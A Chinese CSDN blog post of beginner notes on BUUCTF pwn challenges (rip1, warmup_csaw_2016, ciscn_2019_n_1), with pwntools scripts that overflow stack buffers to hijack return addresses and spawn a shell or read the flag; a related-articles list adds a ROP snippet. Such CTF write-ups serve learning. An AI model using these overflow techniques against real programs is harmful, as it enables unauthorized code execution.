pwn的初学记录

最新推荐文章于 2024-05-14 17:05:08 发布
最新推荐文章于 2024-05-14 17:05:08 发布
阅读量485 收藏
点赞数
分类专栏: pwn 文章标签: ubuntu linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/limenzzz/article/details/127405100
版权

终于配好了自己的pwn机。也是借此记录一下学习记录。题目摘自buuctf

一.pwn机基本介绍

ubuntu20.04 PWN(含x86、ARM、MIPS)环境搭建_hollk的博客-CSDN博客_ubuntu安装pwn环境

按照如上教程配置,python2换成了python3.两者有所差别,以后会在这里进行补充。

区别:

1.python3中byte和string需要转换,在字符串前需要加上b来改变属性。比如

payload=b'a'*44+p64(0x41348000)

2.按照配置python的使用不需要再使用python2直接使用python即可,方便了一些。

二.题目解析 

1.rip1

 先用checksec查看一下有无保护。发现没有

ida看一下主函数发现有get,应该是个栈溢出,找到/bin/sh 

 

 

 溢出调用一下fun即可

在这里直接使用

payload=b'a'*23+p64(0x401186)

出现了错误,查资料得知某些版本glibc调用system会出错,贴上学习链接

在一些64位的glibc的payload调用system函数失败问题 - Rookle - 博客园

 于是构造shellcode

from pwn import *
p = remote('node4.buuoj.cn',29058)
payload=b'a'*23+p64(0x401186+1)
p.sendline(payload)
p.interactive()

得到flag

 2.warmup_csaw_2016

 ida下看到cat flag

还是和上题差不多的栈溢出

shellcode

from pwn import *
p = remote('node4.buuoj.cn',28749)
payload=b'a'*72+p64(0x000000000040060D+1)
p.sendline(payload)
p.interactive()

 

 3.ciscn_2019_n_1

ida看一下主函数,发现是读取v1,判断v2是否等于11.28125.是则获取flag

 而v1和v2传输地址可以转为如图

 

因为使用gets,则栈溢出只需在读入v1时将v2覆盖即可。寻找11.2815的16机制表示。

 发现有两个比较过程,点击查看

找到16进制表示。构造shellcode

from pwn import *
p = remote('node4.buuoj.cn',28794)
payload=b'a'*44+p64(0x41348000)
p.sendline(payload)
p.interactive()

 得到flag

L1men2
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
2024NKCTF-pwn
03-25
2024NKCTF_pwn
welpwn pwn 入门题
02-11
pwn 入门题
BUUCTF PWN rip1 WP
m0_54262894的博客
07-31 2365
BUUCTF PWN rip 1 这是一个WP,也是一个自己练习过程的记录。 先把文件放入pwn机中检查一下,发现并没有开启保护,所以应该是一道简单题 我们运行一下试试,它让你输入一段字符然后将字符输出。 把文件放在ida中查看一下 发现main函数并不复杂,只是定义了一个 s ,而且我们很容易就能找到栈溢出的点,我们都知道gets函数是一个危险函数,对于我们来说它可以接受到无限的字符,所以这里就是我们要pwn掉的点。 我们双击 s ,看它有多少空...
Pwn | CTF】BUUCTF rip1
weixin_46301214的博客
02-02 510
可能是因为fun函数里有system这种终端控制函数,所以能getshell吧。那么来看一下main,发现很简单,只有一个gets获取输入,存到s数组变量里。打开IDA,发现函数里有一个fun函数,能直接调用系统函数。然后又可以建立连接,很屌,解释不清楚,以后做多两题才懂。知道了缓冲区大小,下一步就要知道fun函数的入口地址。这文件是在靶机,就是靶机存在这个漏洞,我们要攻击他。从汇编上看,是能够发现有注释告诉我们的入口地址。我们要做的就是利用这个函数进行调用系统函数。看一下双击s变量,缓冲区大小。
buuctf pwn rip 1,rop解法
amber_o0k的博客
11-07 1104
from pwn import * io = remote('node4.buuoj.cn', 27175) pop_rdi_ret=0x4011fb bin_sh=0x40201b syscall=0x401040 ret=0x401016 payload=b'a'*(0xf+8)+p64(ret)+p64(pop_rdi_ret)+p64(bin_sh)+p64(syscall) io.sendline(payload) io.interactive() 这个解法有点复杂了,强行构造了一波rop。.
PWN-PRACTICE-BUUCTF-1
P1umH0的博客
07-04 169
PWN-PRACTICE-BUUCTF-1
CTF学习日记----buuctf pwn rip
派大星的博客
11-20 739
发布于2019-05-112019-05-11 由Ex在一些64位的glibc的payload调用system函数失败问题 <div class="entry-content"> <p>原先在做题的时候就发现了,一些新的64位的glibc在控制了程序流后,调用system函数的时候,会直接crash,经过调试之后,终于发现了问题所在。</p> 实验用的文件下载,百度网盘:https://pan.baidu.com/s/1mEcCIzeYtDIo-xmHs...
Pwn基础学习1-[栈溢出]/篇2
m0_52343643的博客
03-29 2220
继上一篇的内容 题目3-ret2syscall 定义 控制程序执行系统调用 原理 不同于之前的 ret2text 和 ret2shellcode 题型,系统调用并不是执行程序中现有的代码或自己写进去的代码,其实就如其字面意思,系统调用就是我们让系统来调用一些函数,那么如何做到让系统来调用,需要满足以下几个条件: 某函数的系统调用号【系统调用号表】—— 放在寄存器 eax 需传入某函数的参数 —— 放在寄存器 ebx、ecx、edx 一个指令 —— int 0x80 int 0x80(软中断)
pwn(无system函数下的栈溢出漏洞利用 | 【puts函数】
weixin_43742794的博客
08-09 3212
pwn100及exp 首先用checksec看一下权限的情况 扔进ida64发现是一个栈溢出漏洞,但是并没有system函数和/bin/sh可以使用 这里需要用到一个DynELF类 具体细节可以参见这篇文章 https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=42933&highlight=pwn 核心思路是通过DynELF泄...
PWN.rar_PWN
09-24
本代码是在Keil uVision3环境下使用c语言编写的。功能是使用片内pgaPWN输出占空比可变的方波。
bugku pwn题libc
11-06
bugku pwn题libc,pwn3做题时可在里面查找system、binsh等
安恒ctf pwn课件
10-06
安恒培训资料 栈溢出指的是程序向栈中某个局部变量中写入的字节数超过了这个变量本身所申 请的字节数,因而导致与其相邻的栈中的变量的值被改变。 Ø 程序能够向栈上写入数据。 Ø 写入的数据大小没有被良好地控制。...
pwn,windows无法正确interactive
amber_o0k的博客
11-15 822
cmd和powershell运行pwntools写的py文件有问题,体现为interactive后找不到相关的linux命令,由此引申到vscode也不行。并不是你的脚本有问题,而是windows这些命令行的问题,编码格式?ansi,vt标准之类的?不确定 建议使用pycharm,wsl,虚拟机运行相关文件。 ...
关于python2的pwntools的安装
WidthKim的博客
10-12 731
简单介绍pwntools的python2版本的安装
栈溢出的基础原理,EBP/EIP/ESP详解 --- buuctf rip 1题目讲解
yajuanpi4899的博客
11-28 5440
栈帧概念:一个基本函数所需要的栈空间,当调用子函数时需要调用新的栈帧 涉及到栈有三个寄存器(32):esp,eip,ebp-->对应64位的rsp,rip,rbp esp:指向当前栈帧的顶部。 ebp:指向当前栈帧的底部。 eip:指向当前栈帧中执行的指令。 栈溢出漏洞的基本方向是:父函数(caller)在调用子函数(callee)结束时,会取子函数的return address,这个地址中保存着父函数的基地址。即:在一个函数调用完以后,就要删除此时的栈帧并将Return Address
Pwn学习
红叶的博客
10-25 1093
需要输入的字符数量为112,由于没有system,因此需要使用ROPgadget工具。其中vuln函数与replace函数配合使用,输入的I被replace函数替换为you。这题没什么好说的,打开就是shell函数,使用nc直接连接就可以拿到shell。输入I又被替换为you,因此60/3 = 20,输入20个I即可溢出。栈溢出漏洞,buf2为全局变量,并且是bss段,具有可执行权限。shell的地址为IDA下get_shell函数的地址 即。fun函数为shell函数,main函数中存在栈溢出漏洞。
linux栈溢出漏洞,PWN简单栈溢出漏洞获取shell | kTWO-个人博客
weixin_39611389的博客
05-16 862
摘要本文讲述的是PWN中利用溢出漏洞来执行shell命令的方法教程,本文将以简单的小程序来作为演示,从分析程序到编写payload加以利用,其中还含有二进制程序的保护机制简介。0x01 前言经过前面的几篇文章我们大概以及了解了基本的栈溢出漏洞的利用方式,那今天就来个进阶版。有时候我们在打CTF的时候需要的是获取系统shell,然后通过shell去拿到flag,那么我们该怎么通过溢出漏洞来拿到服务器...
pwn 做题出现的问题
qq_53086690的博客
05-07 694
看网上的一些exp是'a' * 15 + p64(0x401186)这样写的但是自己运行的时候会报错 can only concatenate str (not “bytes”) to str 在网上查了一下是python版本的问题只要在a的前边加上b就可以了b'a' * 15 + p64(0x401186) ...
Ubuntu14.04安装VSCode,秒装方法
最新发布
zanglengyu的专栏
05-14 338
1. 问题:由于开发环境是14.04的ubuntu虚拟机,原本用了VSCode Remote远程插件通过windows链接虚拟机项目。不过经常因为网络原因,或者其他奇怪的问题,整个过程不是舒畅。所以,想着干脆直接在虚拟机装一个好了。由于系统换的代价暂时过大,电脑垃圾ubuntu版本太新,会有卡顿问题等等。所以开始踩坑,网上搜索了一堆,各种奇怪的安装方式。直接下载tar.gz,然后解压打虚拟机的/opt目录。如此,再重新执行打开就舒服多了。需要升级下有个库的版本,然后直接打卡就行了。
docker pwn
01-29
Docker Pwn是一种使用Docker容器来解决CTF(Capture The Flag)挑战的方法。它提供了一个轻量级的环境,可以在其中运行和调试二进制文件,以便进行漏洞利用和渗透测试。 要使用Docker Pwn,您可以按照以下步骤进行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值